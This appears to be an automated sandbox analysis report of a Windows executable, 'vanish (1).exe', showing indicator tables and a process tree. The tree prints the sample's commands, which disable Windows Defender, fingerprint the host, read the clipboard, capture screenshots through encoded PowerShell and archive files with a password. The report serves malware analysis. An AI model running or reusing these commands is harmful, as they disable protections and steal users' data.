Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
5916	chrome.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe
1692	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3376	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4968 wrote to memory of 2504	4968	vanish (1).exe	83
PID 4968 wrote to memory of 2504	4968	vanish (1).exe	83
PID 2504 wrote to memory of 1064	2504	vanish (1).exe	84
PID 2504 wrote to memory of 1064	2504	vanish (1).exe	84
PID 2504 wrote to memory of 4320	2504	vanish (1).exe	85
PID 2504 wrote to memory of 4320	2504	vanish (1).exe	85
PID 2504 wrote to memory of 2328	2504	vanish (1).exe	87
PID 2504 wrote to memory of 2328	2504	vanish (1).exe	87
PID 2504 wrote to memory of 3620	2504	vanish (1).exe	90
PID 2504 wrote to memory of 3620	2504	vanish (1).exe	90
PID 2504 wrote to memory of 2076	2504	vanish (1).exe	92
PID 2504 wrote to memory of 2076	2504	vanish (1).exe	92
PID 4320 wrote to memory of 4176	4320	cmd.exe	94
PID 4320 wrote to memory of 4176	4320	cmd.exe	94
PID 2076 wrote to memory of 4988	2076	cmd.exe	95
PID 2076 wrote to memory of 4988	2076	cmd.exe	95
PID 3620 wrote to memory of 4332	3620	cmd.exe	96
PID 3620 wrote to memory of 4332	3620	cmd.exe	96
PID 2328 wrote to memory of 2992	2328	cmd.exe	97
PID 2328 wrote to memory of 2992	2328	cmd.exe	97
PID 1064 wrote to memory of 3296	1064	cmd.exe	98
PID 1064 wrote to memory of 3296	1064	cmd.exe	98
PID 2504 wrote to memory of 4476	2504	vanish (1).exe	100
PID 2504 wrote to memory of 4476	2504	vanish (1).exe	100
PID 4476 wrote to memory of 2964	4476	cmd.exe	102
PID 4476 wrote to memory of 2964	4476	cmd.exe	102
PID 2504 wrote to memory of 4728	2504	vanish (1).exe	103
PID 2504 wrote to memory of 4728	2504	vanish (1).exe	103
PID 4728 wrote to memory of 4708	4728	cmd.exe	105
PID 4728 wrote to memory of 4708	4728	cmd.exe	105
PID 2504 wrote to memory of 4632	2504	vanish (1).exe	106
PID 2504 wrote to memory of 4632	2504	vanish (1).exe	106
PID 4632 wrote to memory of 3916	4632	cmd.exe	108
PID 4632 wrote to memory of 3916	4632	cmd.exe	108
PID 2504 wrote to memory of 3496	2504	vanish (1).exe	109
PID 2504 wrote to memory of 3496	2504	vanish (1).exe	109
PID 3496 wrote to memory of 3988	3496	cmd.exe	111
PID 3496 wrote to memory of 3988	3496	cmd.exe	111
PID 2504 wrote to memory of 964	2504	vanish (1).exe	113
PID 2504 wrote to memory of 964	2504	vanish (1).exe	113
PID 2504 wrote to memory of 4260	2504	vanish (1).exe	112
PID 2504 wrote to memory of 4260	2504	vanish (1).exe	112
PID 964 wrote to memory of 680	964	cmd.exe	116
PID 964 wrote to memory of 680	964	cmd.exe	116
PID 4260 wrote to memory of 2892	4260	cmd.exe	117
PID 4260 wrote to memory of 2892	4260	cmd.exe	117
PID 2504 wrote to memory of 1396	2504	vanish (1).exe	118
PID 2504 wrote to memory of 1396	2504	vanish (1).exe	118
PID 2504 wrote to memory of 3892	2504	vanish (1).exe	119
PID 2504 wrote to memory of 3892	2504	vanish (1).exe	119
PID 2504 wrote to memory of 4156	2504	vanish (1).exe	121
PID 2504 wrote to memory of 4156	2504	vanish (1).exe	121
PID 4156 wrote to memory of 2228	4156	cmd.exe	124
PID 4156 wrote to memory of 2228	4156	cmd.exe	124
PID 3892 wrote to memory of 1328	3892	cmd.exe	125
PID 3892 wrote to memory of 1328	3892	cmd.exe	125
PID 1396 wrote to memory of 1192	1396	cmd.exe	126
PID 1396 wrote to memory of 1192	1396	cmd.exe	126
PID 2504 wrote to memory of 4576	2504	vanish (1).exe	127
PID 2504 wrote to memory of 4576	2504	vanish (1).exe	127
PID 2504 wrote to memory of 512	2504	vanish (1).exe	129
PID 2504 wrote to memory of 512	2504	vanish (1).exe	129
PID 2504 wrote to memory of 4556	2504	vanish (1).exe	130
PID 2504 wrote to memory of 4556	2504	vanish (1).exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\vanish (1).exe
"C:\Users\Admin\AppData\Local\Temp\vanish (1).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4968
- C:\Users\Admin\AppData\Local\Temp\vanish (1).exe
  "C:\Users\Admin\AppData\Local\Temp\vanish (1).exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\vanish (1).exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\vanish (1).exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('python that you are using is old', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2328
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('python that you are using is old', 0, 'Error', 0+16);close()"
      4⤵
      PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3620
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2076
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4728
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3496
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4260
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:964
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1396
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3892
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4576
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:512
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4956
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\alkqdhrs\alkqdhrs.cmdline"
        5⤵
        
        PID:4776
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAEAF.tmp" "c:\Users\Admin\AppData\Local\Temp\alkqdhrs\CSCFFCB2701FF4954BC9791D495496A7A.TMP"
        6⤵
        
        PID:944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3784
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2224
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4668
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2368
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:312
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3744
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49682\rar.exe a -r -hp"linux" "C:\Users\Admin\AppData\Local\Temp\mZkLj.zip" *"
    3⤵
    PID:2016
  - - C:\Users\Admin\AppData\Local\Temp\_MEI49682\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI49682\rar.exe a -r -hp"linux" "C:\Users\Admin\AppData\Local\Temp\mZkLj.zip" *
